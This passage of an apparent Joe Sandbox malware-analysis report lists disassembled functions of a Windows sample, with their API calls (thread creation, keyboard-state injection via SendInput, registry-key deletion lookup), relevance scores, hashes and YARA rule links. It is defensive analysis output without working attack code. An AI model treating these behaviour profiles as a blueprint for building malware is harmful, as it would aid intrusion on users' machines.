                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: bb8068f02d799d687f86b9c43e1e9df3108372b57b840b2ce394e22bf251b6d0
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 083f1b3d72dc2b4e3073d7627409da2efaae6cca9fbdfa2eb2c15b7cb2a145f7
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bb8068f02d799d687f86b9c43e1e9df3108372b57b840b2ce394e22bf251b6d0
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4511E672501604EFC720AF76DC868DF7BA4EF80334F21412FF525922D1DB788981966D
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00439102 Relevance: 10.5, APIs: 7, Instructions: 46threadCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00438FE4: GetProcessHeap.KERNEL32(00000008,0000000C,0043910A,00000000,00000000,00000000,0044646E,?,?,?), ref: 00438FE8
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00438FE4: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00438FEF
                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,0044646E,?,?,?), ref: 00439119
                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439123
                                                                                                                                                                                                                                                                                                                                                                                                                • DuplicateHandle.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0043912C
                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00439138
                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439142
                                                                                                                                                                                                                                                                                                                                                                                                                • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00439145
                                                                                                                                                                                                                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,004390C2,00000000,00000000,00000000), ref: 0043915E
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1957940570-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: ae016cd78919e3da0d3d218cc031d8d4f693afb8d34ff927aa47fd3b6f506194
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: b388a4287fabc35bf2088fa38ebc9459a42e34e8a642192e1b63b89709cb9be3
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ae016cd78919e3da0d3d218cc031d8d4f693afb8d34ff927aa47fd3b6f506194
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3BF0CD753413007BD220EB65DC86F5BB7A8EBC9B10F118919F6049B1D1C6B4A800CB65
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0041568B Relevance: 10.5, APIs: 7, Instructions: 37threadCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • ___set_flsgetvalue.LIBCMT ref: 00415690
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                                                                                                                                                                                                                                                                                                                                                                                                • ___fls_getvalue@4.LIBCMT ref: 0041569B
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                                                                                                                                                                                                                                                                                                                                                                                                • ___fls_setvalue@8.LIBCMT ref: 004156AD
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                                                                                                                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,?,00000000), ref: 004156B6
                                                                                                                                                                                                                                                                                                                                                                                                                • ExitThread.KERNEL32 ref: 004156BD
                                                                                                                                                                                                                                                                                                                                                                                                                • __freefls@4.LIBCMT ref: 004156D9
                                                                                                                                                                                                                                                                                                                                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 004156EC
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Value$__decode_pointer$CurrentErrorExitImageLastNonwritableThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 4166825349-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 185d0aae8fe32bab84a079219336c355dd614541d1aff55515eff8c05f91681e
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 1015f584654e325efa3cacb901eba7c9ae2b5aefa54885f90b4e6d99173acdac
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 185d0aae8fe32bab84a079219336c355dd614541d1aff55515eff8c05f91681e
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 14F049745007009BD704BF72DD159DE7B69AF85345761C85FB80897222DA3DC9C1CB9C
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00434124 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 15libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(advapi32.dll,p#D,0043415E,p#D,?,00442370,?), ref: 00434134
                                                                                                                                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00434146
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: RegDeleteKeyExW$advapi32.dll$p#D$p#D
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2574300362-3261711971
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 3da92f374f37a9fa7395fa6ef73d3af1d379715eec5b41da1672ebd70bf57acc
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: cb82693085896f9455b4638215a98dd7e3cb824177552166877179ce6000b7c2
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3da92f374f37a9fa7395fa6ef73d3af1d379715eec5b41da1672ebd70bf57acc
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D8D05EB0400B039FCB105F24D8086AB76F4EB68700F208C2EF989A3750C7B8E8C0CB68
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0047B1D0 Relevance: 9.5, APIs: 6, Instructions: 489COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: c82efa3070467c2623ec738b5b2be2cd760763614a3dd1863134219050ad48d5
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: be39947db1ffbcb7075193c31d102fc15fe4f6af8d23ce90efbce3d2b6a77a88
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c82efa3070467c2623ec738b5b2be2cd760763614a3dd1863134219050ad48d5
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4BF16D71108740AFD210DB59C880EABB7F9EFCA744F10891EF69983261D735AC45CBAA
                                                                                                                                                                                                                                                                                                                                                                                                                Function 004336C7 Relevance: 9.3, APIs: 6, Instructions: 253COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 00433724
                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 00433757
                                                                                                                                                                                                                                                                                                                                                                                                                • GetClientRect.USER32(0000001D,?), ref: 004337AC
                                                                                                                                                                                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(0000000F), ref: 00433800
                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00433814
                                                                                                                                                                                                                                                                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 00433842
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3220332590-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 3d0204db3781b081fd3de6a8efec2d06c6e501bf89adf1cf9fb69463b8de8f3e
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 40e56d112be44df416332e5c874318f33691c6b0c201ea6c9f9086adb5117cf0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3d0204db3781b081fd3de6a8efec2d06c6e501bf89adf1cf9fb69463b8de8f3e
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E9A126B42147028AC324CF68C5847ABBBF1FF98715F04991EE9D983360E775E908CB5A
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00457838 Relevance: 9.2, APIs: 6, Instructions: 176COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _malloc_wcslen$_strcat_wcscpy
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1612042205-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: b8a3413a850b3e9d022a14bc02158d0a95917de16b2476bc53e0af5cb97ab780
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 39b6431fb86a1cae222df6ecce28f21653e085caad8de22f1e35678e4483a9b6
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b8a3413a850b3e9d022a14bc02158d0a95917de16b2476bc53e0af5cb97ab780
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CD613B70504202EFCB10EF29D58096AB3E5FF48305B50496EF8859B306D738EE59DB9A
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0044C522 Relevance: 9.2, APIs: 6, Instructions: 155windowkeyboardCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • GetKeyboardState.USER32(?,?,00000001,00000001,?,00000000), ref: 0044C588
                                                                                                                                                                                                                                                                                                                                                                                                                • SetKeyboardState.USER32(00000080), ref: 0044C59B
                                                                                                                                                                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000104,?,?), ref: 0044C5EC
                                                                                                                                                                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000100,?,?), ref: 0044C610
                                                                                                                                                                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C637
                                                                                                                                                                                                                                                                                                                                                                                                                • SendInput.USER32 ref: 0044C6E2
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessagePost$KeyboardState$InputSend
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2221674350-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 061e63fcf1402e721e52ee56d2f22f81c2cbe03cfd8f861d8ff00d299370d474
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 3a634557d1668dba9f4fbb3ffee1259adddcddb7f3fce46f2ce6721246940f3b
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 061e63fcf1402e721e52ee56d2f22f81c2cbe03cfd8f861d8ff00d299370d474
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A24148725053486AF760EF209C80BFFBB98EF95324F04151FFDC412281D66E984987BA
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00445153 Relevance: 9.1, APIs: 6, Instructions: 142COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _wcscpy$_wcscat
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2037614760-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 43efba16cd806b31402fe34b2becc3a5af32a5b4a383a164d4ea5773e04486ac
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 871aa96d6b0d5f43eceffdadd72b032f7becd6ba50fbda5e2bca5dd503650597
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 43efba16cd806b31402fe34b2becc3a5af32a5b4a383a164d4ea5773e04486ac
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7D41BD31901A256BDE317F55D880BBB7358DFA1314F84006FF98247313EA6E5892C6BE
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00447B66 Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • BeginPaint.USER32(00000000,?,004A83D8,?), ref: 00447B9D
                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00447C1B
                                                                                                                                                                                                                                                                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 00447C39
                                                                                                                                                                                                                                                                                                                                                                                                                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C4C
                                                                                                                                                                                                                                                                                                                                                                                                                • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447C93
                                                                                                                                                                                                                                                                                                                                                                                                                • EndPaint.USER32(?,?), ref: 00447CD1
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 4189319755-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 37bca05dc5f282a43c1c57c3b808f61ec058395b4d713bcb6da44fc2610780a1
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: de699fe3e67e71f806f86ee7feca1bcffcb0489daa19151882f3061068cc4b26
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 37bca05dc5f282a43c1c57c3b808f61ec058395b4d713bcb6da44fc2610780a1
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D14182705043019FE320DF15C8C8F7B7BA8EB89724F04466EF9548B391DB74A846CB69
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0044B474 Relevance: 9.1, APIs: 6, Instructions: 113fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B490
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                                                                                                                                                                                                                                                                                                                • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4C2
                                                                                                                                                                                                                                                                                                                                                                                                                • EnterCriticalSection.KERNEL32(00000000), ref: 0044B4E3
                                                                                                                                                                                                                                                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(00000000), ref: 0044B5A0
                                                                                                                                                                                                                                                                                                                                                                                                                • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B5BB
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                                                                                                                                                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5D1
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
